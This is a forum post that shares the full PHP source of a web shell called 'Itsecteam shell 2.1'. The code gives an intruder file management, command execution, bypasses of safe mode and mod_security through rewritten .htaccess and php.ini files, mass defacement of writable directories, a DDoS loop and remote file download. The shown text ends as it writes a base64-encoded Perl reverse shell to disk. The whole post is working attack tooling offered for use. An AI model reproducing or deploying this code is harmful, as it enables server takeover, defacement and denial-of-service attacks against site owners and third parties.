Itsecteam shell 2.1 [SHARE]
Posted: Sun Nov 21, 2010 10:14 pm
Code: Select all
<?php
session_start();
set_time_limit(0);
error_reporting(0);
if (get_magic_quotes_gpc()) {
function stripslashes_deep($value) {
$value = is_array($value) ?
array_map('stripslashes_deep', $value) :
stripslashes($value);
return $value;
}
$_POST = array_map('stripslashes_deep', $_POST);
$_GET = array_map('stripslashes_deep', $_GET);
$_COOKIE = array_map('stripslashes_deep', $_COOKIE);
$_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
if($_GET***91;'do'***93;=="remove"){
unlink(getcwd().$_SERVER***91;"SCRIPT_NAME"***93;);
}
$basep=$_SERVER***91;'DOCUMENT_ROOT'***93;;
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
$slash="\\";
$basep=str_replace("/","\\",$basep);
}else{
$slash="/";
$basep=str_replace("\\","/",$basep);
}
if($_GET***91;'do'***93;=="remove"){
unlink(getcwd().$slash.$_SERVER***91;"SCRIPT_NAME"***93;);
}
if ($_REQUEST***91;'address'***93;){
if(is_readable($_REQUEST***91;'address'***93;)){
chdir($_REQUEST***91;'address'***93;);}else{
alert("Permission Denied !");}}
$me=$_SERVER***91;'PHP_SELF'***93;;
$formp="<form method=post action='".$me."'>";
$formg="<form method=get action='".$me."'>";
$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
if (isset($_FILES***91;"filee"***93;) and ! $_FILES***91;"filee"***93;***91;"error"***93;) {
if(move_uploaded_file($_FILES***91;"filee"***93;***91;"tmp_name"***93;, $_FILES***91;"filee"***93;***91;"name"***93;)){
alert("File Upload Successful");
}else{
alert("Permission Denied !");
}
}
if(ini_get('disable_functions')){
$disablef=ini_get('disable_functions');
}else{
$disablef="All Functions Enable";
}
if(ini_get('safe_mode')){
$safe_modes="On";
}else{
$safe_modes="Off";
}
if ($_REQUEST***91;'chmode'***93; && $_REQUEST***91;'chmodenum'***93;){
if (chmod($_POST***91;'chmode'***93;,"0".$_POST***91;'chmodenum'***93;)){alert("Chmod Ok!");}else{alert("Permission Denied !");}
}
$picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1TQDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bOJd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7vuf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wcU9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1nVjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFfBsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQnG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkligaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII=';
$picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAABaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gnnzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036wOzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj/40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3sdeeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1nb7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb+B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmCC';
$head='<style type="text/css">
A:link {text-decoration: none}
A:visited {text-decoration: none}
A:active {text-decoration: none}
A:hover {text-decoration: underline overline; color: 414141;}
.focus td{border-top:0px solid #f8f8f8;border-bottom:1px solid #ddd;background:#f2f2f2;padding:0px 0px 0px 0px;}
</style><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>iTSecTeam</title>
</head><body topmargin="0" leftmargin="0" rightmargin="0"
bgcolor="#f2f2f2"><div align="center">
<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
<tr>
<td height="30" width="996">
<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=home">Home</a> -- <a href="?do=filemanager&address='.getcwd().'">File Manager</a> -- <a href="?do=cmd&address='.getcwd().'">Command Execute</a> -- <a href="?do=bc&address='.getcwd().'">Back Connect</a> --
<a href="?do=bypasscmd&address='.getcwd().'">BypasS Command eXecute(SF-DF)</a> -- <a href="?do=symlink&address='.getcwd().'">Symlink</a> --
<a href="?do=bypassdir&address='.getcwd().'">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
Eval Php</a> -- <a href="?do=db&address='.getcwd().'">Data Base</a> -- <a href="?do=convert&address='.getcwd().'">Convert</a> -- <a href="?do=mail&address='.getcwd().'">Mail Boomber</a><a href="?do=info&address='.getcwd().'">
<br>Server Information</a> -- <a href="?do=d0slocal&address='.getcwd().'">Dos Local Server</a> -- <a href="?do=dump&address='.getcwd().'">Backup Database</a> -- <a href="?do=mass&address='.getcwd().'">Mass Deface</a> -- <a href="?do=dlfile&address='.getcwd().'">Download Remote File</a> -- <a href="?do=dd0s&address='.getcwd().'">DDoS</a> -- <a href="?do=perm&address='.getcwd().'">Find Writable Directory</a> -- <a href="?do=apache&address='.getcwd().'">Server</a> -- <a href="?do=remove&address='.getcwd().'">Remove Me</a> -- <a href="?do=about&address='.getcwd().'">About</a>
</span></font></td></tr></table></div>
<div align="center">
<table id="table2" style="border-collapse: collapse; border-style:
solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 1px; margin-bottom: 0px;
border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
height="10" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr><font face="Tahoma" style="font-size: 9pt"><div align="center">
Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.' <td style="border: 1px solid rgb(198, 198, 198);"
width="950" bgcolor="#e7e3de" height="10" valign="top">';
$end='</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">'.base64_decode("Q29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWsp").'<br><a href="http://www.itsecteam.com" target="_blank"><font size=1>'.base64_decode("aVRTZWNUZWFtLmNvbQ==").'</a></font></span></td></tr></tbody></table></div></body></html>';
$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
function alert($text){
echo "<script>alert('".$text."')</script>";
}
if ($_GET***91;'do'***93;=="edit" && $_GET***91;'filename'***93;!="dir"){
if(is_readable($_GET***91;'address'***93;.$_GET***91;'filename'***93;)){
$opedit=fopen($_GET***91;'address'***93;.$_GET***91;'filename'***93;,"r");
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit);
echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET***91;'address'***93;.$_GET***91;'filename'***93;.'<br><textarea rows="19" name="fedit" cols="87">'.htmlentities("$data").'</textarea><br><input value='.$_GET***91;'filename'***93;.' name=namefe><br><input type=submit value=" Save "></form></p>'.$end;exit;
}else{alert("Permission Denied !");}}
function sizee($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
if($_REQUEST***91;'do'***93;=='about'){
echo $head."<p align='center'><b><font color=red>ITSecTeam, IT Security Research & Penetration Testing Team</b></font><br>Version 2.1 <br>Last Update : 2010/10/10<br>Coded By : Amin Shokohi(Pejvak)<br>Special Thanks([email protected] , Am!rkh@n , R3dm0ve , Provider , H4mid@Tm3l , ahmadbady , Doosib )<br>Home Page : <a href='http://www.itsecteam.com'>http://www.itsecteam.com</a><br>Update Notice: <a href='http://itsecteam.com/en/tools/itsecteam_shell.htm'>ITSecTeam Shell</a><br>Forum : <a href='http://www.forum.itsecteam.com'>http://www.forum.itsecteam.com</a><br>
<center>
<PRE>
______ ______ ____ ______
/\__ _\/\__ _\/\ _`\ /\__ _\
\/_/\ \/\/_/\ \/\ \,\L\_\ __ ___\/_/\ \/ __ __ ___ ___
\ \ \ \ \ \ \/_\__ \ /'__`\ /'___\ \ \ \ /'__`\ /'__`\ /' __` __`\
\_\ \__ \ \ \ /\ \L\ \/\ __//\ \__/ \ \ \/\ __//\ \L\.\_/\ \/\ \/\ \
/\_____\ \ \_\ \ `\____\ \____\ \____\ \ \_\ \____\ \__/.\_\ \_\ \_\ \_\
\/_____/ \/_/ \/_____/\/____/\/____/ \/_/\/____/\/__/\/_/\/_/\/_/\/_/
</PRE>
".$end;exit;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}
function download($fileadd,$finame){
$dlfilea=$fileadd.$finame;
header("Content-Disposition: attachment; filename=" . $finame);
header("Content-Type: application/download");
header("Content-Length: " . filesize($dlfilea));
flush();
$fp = fopen($$dlfilea, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);
}
if($_GET***91;'do'***93;=="rename"){
echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET***91;'filename'***93;.'><input type=hidden name=addressren value='.$_GET***91;'address'***93;.$_GET***91;'filename'***93;.'> To <input name=nameren><br><input type=submit value=" Save "></form></p>'.$end;exit;
}
if ($_GET***91;'byapache'***93;=='ofms'){
$fse=fopen(getcwd().$slash.".htaccess","w");
fwrite($fse,'<IfModule mod_security.c>
Sec------Engine Off
Sec------ScanPOST Off
</IfModule>');
fclose($fse);
}elseif ($_GET***91;'byapache'***93;=='bysap'){
$fse=fopen(getcwd().$slash.".htaccess","w");
fwrite($fse,'Options +FollowSymLinks
DirectoryIndex Persian-Gulf-For-Ever.html');
fclose($fse);
}elseif ($_GET***91;'byapache'***93;=='sfadf'){
$fse=fopen(getcwd().$slash."php.ini","w");
fwrite($fse,'safe_mode=OFF
disable_functions=NONE');
fclose($fse);
}
if($_GET***91;'do'***93;=="apache"){
echo $head.$formg.$nowaddress.'<p align="center">
<select name=byapache>
<option value="ofms">Off Mode Security(.htaccess)</option><option value="bysap">Bypass Symlink(.htaccess)</option>
<option value="sfadf">Disable Safe Mode & Disable Function(Php.ini)</option>
</select><br><input type=submit value=eXecute></form></p>'.$end;exit;
}
if($_GET***91;'do'***93;=="dd0s"){
echo $head.$formg.$nowaddress.'<p align="center">Address : <input name=urldd0 size=50> Time : <input name=timedd0 size=6 value=40000><br><input type=submit value=" DDoS "></form></p>'.$end;exit;
}
if($_GET***91;'urldd0'***93; && $_GET***91;'timedd0'***93;){
for ($id=0;$$id<$_GET***91;'timedd0'***93;;$id++){
$fp=null;
$contents=null;
$fp=fopen($_GET***91;'urldd0'***93;,"rb");
while (!feof($fp)) {
$contents .= fread($fp, 8192);
}
fclose($fp);
}}
if($_GET***91;'do'***93;=="dlfile"){
echo $head.$formp.$nowaddress.'<p align="center">Download Remote File!<br>Address : <input name=adlr size=70><br>Save To : <input name=adsr value='.getcwd().$slash.' size=70><br><input type=submit value=" Download "></form></p>'.$end;exit;
}
function dirpe($addres){
global $slash;
$idd=0;
if ($dirhen = @opendir($addres)) {
while ($file = readdir($dirhen)) {
$permdir=str_replace('//','/',$addres.$slash.$file);
if($file!='.' && $file!='..' && is_dir($permdir)){
if (is_writable($permdir)) {
$dirdata***91;$idd***93;***91;'filename'***93;=$permdir;
$idd++;
}
dirpe($permdir);
}
}
closedir($dirhen);
} else {
return ("notperm");
}
if ($dirdata){
return $dirdata;
}else{
return "notfound";
}
}
function dirpmass($addres,$massname,$masssource){
global $slash;
$idd=0;
if ($dirhen = @opendir($addres)) {
while ($file = readdir($dirhen)) {
$permdir=str_replace('//','/',$addres.$slash.$file);
if($file!='.' && $file!='..' && is_dir($permdir)){
if (is_writable($permdir)) {
if ($fm=fopen($permdir.$slash.$massname,"w")){
fwrite($fm,$masssource);
fclose($fm);
$dirdata***91;$idd***93;***91;'filename'***93;=$permdir;
}
$idd++;
}
dirpmass($permdir);
}
}
closedir($dirhen);
} else {
return ("notperm");
}
if ($dirdata){
return $dirdata;
}else{
return "notfound";
}
}
if($_GET***91;'do'***93;=="perm"){
echo $head.$formp.'<p align="center">Find All Folder Writeable<br> <input name=affw value="'.getcwd().$slash.'" size=50><br><input type=submit value=" Search "></form></p>'.$end;exit;
}
if ($_POST***91;'affw'***93;){
$arrfilelist=dirpe($_POST***91;'affw'***93;);
if ($arrfilelist=='notfound'){
alert("Not Found !");
}elseif($arrfilelist=='notperm'){
alert("Permission Denied !");
}else{
foreach ($arrfilelist as $tmpdir){
if ($coi %2){
$colort='"#e7e3de"';
}else{
$colort='"#e4e1de"';}
$coi++;
$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir***91;'filename'***93;.'"><b>'.$tmpdir***91;'filename'***93;.'</b></span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
}
echo $head.'
<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
</tr></table>'.$permdir.'</table>
<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">
<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
<td width="750"><font face="Tahoma" style="font-size: 10pt">
<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
}}
if($_GET***91;'do'***93;=="mass"){
echo $head.$formp.'<p align="center">***91;Mass Deface***93;<br><input name=mffw value="'.getcwd().$slash.'" size=50><input name=massname value="def.htm" size=10><br><textarea name=masssource cols=60 rows=18>Source</textarea><br><input type=submit value=" Mass "></form></p>'.$end;exit;
}
if ($_POST***91;'mffw'***93;){
$arrfilelist=dirpmass($_POST***91;'mffw'***93;,$_POST***91;'massname'***93;,$_POST***91;'masssource'***93;);
if ($arrfilelist=='notfound'){
alert("Not Found !");
}elseif($arrfilelist=='notperm'){
alert("Permission Denied !");
}else{
foreach ($arrfilelist as $tmpdir){
if ($coi %2){
$colort='"#e7e3de"';
}else{
$colort='"#e4e1de"';}
$coi++;
$permdir=$permdir.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?address='.$tmpdir***91;'filename'***93;.'"><b>'.$tmpdir***91;'filename'***93;.'</b></span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td></tr></table>';
}
echo $head.'
<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
</tr></table>'.$permdir.'</table>
<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Directory</font></td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">Upload ---> </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
<input type=submit value=Upload /><br>'.$ifupload.'</form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----></b> File : </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode> Permission : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Create Dir ----></b> Dirctory Name </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">
<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Create File ----></b> Name File </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Create "></form></td></tr><tr>
<td width="200" align="right" valign="top">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Copy ----></b></b> File : </td>
<td width="750"><font face="Tahoma" style="font-size: 10pt">
<input size=40 name=copyname> To Directory <input size=40 name=cpyto> <input type=submit value =Copy></form></td>'.$end;exit;
}}
if($_POST***91;'adlr'***93; && $_POST***91;'adsr'***93;){
$url = $_POST***91;'adlr'***93;;
$newfname = $_POST***91;'adsr'***93; . basename($url);
$file = fopen ($url, "rb");
if ($file) {
$newf = fopen ($newfname, "wb");
if ($newf)
while(!feof($file)) {
fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
}
alert("File Downloaded Success");
}else{alert("Can Not Open File");}
if ($file) {
fclose($file);
}
if ($newf) {
fclose($newf);
}
}
if($_GET***91;'do'***93;=="down" and $_GET***91;'type'***93;=='file'){
download($_GET***91;'address'***93;,$_GET***91;'filename'***93;);}
if($_GET***91;'do'***93;=="down" and $_GET***91;'type'***93;=='dir'){
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function add_dir($name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x0a\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00";
$fr .= "\x00\x00\x00\x00";
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("V",0);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec***91;***93; = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x0a\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("V",0);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$ext = "\x00\x00\x10\x00";
$ext = "\xff\xff\xff\xff";
$cdrec .= pack("V", 16 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir***91;***93; = $cdrec;
}
function add_file($data, $name)
{
$name = str_replace("\\", "/", $name);
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= "\x00\x00\x00\x00";
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$fr .= pack("v", strlen($name) );
$fr .= pack("v", 0 );
$fr .= $name;
$fr .= $zdata;
$fr .= pack("V",$crc);
$fr .= pack("V",$c_len);
$fr .= pack("V",$unc_len);
$this -> datasec***91;***93; = $fr;
$new_offset = strlen(implode("", $this->datasec));
$cdrec = "\x50\x4b\x01\x02";
$cdrec .="\x00\x00";
$cdrec .="\x14\x00";
$cdrec .="\x00\x00";
$cdrec .="\x08\x00";
$cdrec .="\x00\x00\x00\x00";
$cdrec .= pack("V",$crc);
$cdrec .= pack("V",$c_len);
$cdrec .= pack("V",$unc_len);
$cdrec .= pack("v", strlen($name) );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("v", 0 );
$cdrec .= pack("V", 32 );
$cdrec .= pack("V", $this -> old_offset );
$this -> old_offset = $new_offset;
$cdrec .= $name;
$this -> ctrl_dir***91;***93; = $cdrec;
}
function file() {
$data = implode("", $this -> datasec);
$ctrldir = implode("", $this -> ctrl_dir);
return
$data.
$ctrldir.
$this -> eof_ctrl_dir.
pack("v", sizeof($this -> ctrl_dir)).
pack("v", sizeof($this -> ctrl_dir)).
pack("V", strlen($ctrldir)).
pack("V", strlen($data)).
"\x00\x00";
}
}
$dlfolder=$_GET***91;'address'***93;.$slash.$_GET***91;'dirname'***93;.$slash;
$zipfile = new zipfile();
function get_files_from_folder($directory, $put_into) {
global $zipfile;
if ($handle = opendir($directory)) {
while (false !== ($file = readdir($handle))) {
if (is_file($directory.$file)) {
$fileContents = file_get_contents($directory.$file);
$zipfile->add_file($fileContents, $put_into.$file);
} elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) {
$zipfile->add_dir($put_into.$file.'/');
get_files_from_folder($directory.$file.'/', $put_into.$file.'/');
}
}
}
closedir($handle);
}
$datedl=date("y-m-d");
get_files_from_folder($dlfolder,'');
header("Content-Disposition: attachment; filename=" . $_GET***91;'dirname'***93;."-".$datedl.".zip");
header("Content-Type: application/download");
header("Content-Length: " . strlen($zipfile -> file()));
flush();
echo $zipfile -> file();
$filename = $_GET***91;'dirname'***93;."-".$datedl.".zip";
$fd = fopen ($filename, "wb");
$out = fwrite ($fd, $zipfile -> file());
fclose ($fd);
}
if ($_REQUEST***91;'cdirname'***93;){
if(mkdir($_REQUEST***91;'cdirname'***93;,"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}}
function bcn($ipbc,$pbc){
$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
$opbc=fopen("bcc.pl","w");
fwrite($opbc,base64_decode($bcperl));
